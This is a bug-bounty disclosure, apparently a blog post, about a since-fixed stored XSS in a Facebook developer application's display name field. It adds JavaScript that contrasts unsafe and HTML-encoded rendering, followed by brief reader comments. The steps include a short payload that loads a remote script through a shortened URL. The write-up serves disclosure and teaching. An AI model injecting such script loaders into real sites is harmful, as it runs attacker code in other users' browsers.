The vulnerability was in the display name field of the application. The following steps were taken to produce the XSS on my Firefox 15.0 browser:
- I created a malicious script, a file containing "alert(/XSSed/)", and hosted it on my server. The URL of the file became http://yujikosuga.com/xss.js
- I shortened the URL to http://goo.gl/p3skt because the maximum character length of the display name field is limited to 32 characters.
- I created a new Facebook application on the Developers website and set its display name to "<script src=//goo.gl/p3skt/><!--".
- I clicked on the Open Graph tab in the left menu, entered "xss" into the input fields and proceeded to the next page.
- I opened the Action Types section.
- An alert popup showing "/XSSed/" was displayed in my browser: the script had executed.
This vulnerability was reported on August 30 and fixed on September 5 as part of Facebook's Security Bug Bounty Program.
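The root cause described above is a stored XSS: the display name was written into the page's markup without output encoding, and the 32-character input limit did nothing to stop it. The following is an added example (not code from the original post or from Facebook) contrasting a vulnerable renderer with one that HTML-encodes on output; the `renderUnsafe`, `renderSafe` and `escapeHtml` names are assumptions, and the payload is the one quoted in the steps above.

```javascript
// Added example: rendering a user-controlled display name into HTML.
// The field limit the post mentions; a length check is not an XSS defence.
const MAX_DISPLAY_NAME = 32;

// Constructed input: the payload from the write-up. It is exactly 32
// characters, so it passes the input-side length check unchanged.
const PAYLOAD = '<script src=//goo.gl/p3skt/><!--';

// Input-side check as the application enforced it.
function passesLengthCheck(displayName) {
  return displayName.length <= MAX_DISPLAY_NAME;
}

// Vulnerable "before": the raw name is concatenated into markup, so a
// name containing "<script" starts a real script element in the page.
function renderUnsafe(displayName) {
  return `<h1 class="app-name">${displayName}</h1>`;
}

// Contextual output encoding for HTML text content: every character that
// can open a tag, close an attribute or end an element is replaced by an
// entity, so the browser treats the whole name as text.
function escapeHtml(str) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  };
  return String(str).replace(/[&<>"'/]/g, (c) => map[c]);
}

// Hardened "after": encode on output, regardless of any input validation.
function renderSafe(displayName) {
  return `<h1 class="app-name">${escapeHtml(displayName)}</h1>`;
}

// Simple check a reviewer or test suite can run over rendered output:
// does the markup contain the start of a script element?
function rendersScriptTag(html) {
  return /<script\b/i.test(html);
}
```

The encoded output still displays the literal text "<script src=//goo.gl/p3skt/><!--" to the user, which is exactly what a display name should do.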
Did you get any cash?
Yes, I did. This vulnerability was eligible for a reward as part of Facebook's Security Bug Bounty Program.
Nice finding Yuji.... btw, one question: was it only cross-domain XSS that was not getting filtered?
Hi Yuji, are you currently still finding any XSS exploits in Facebook?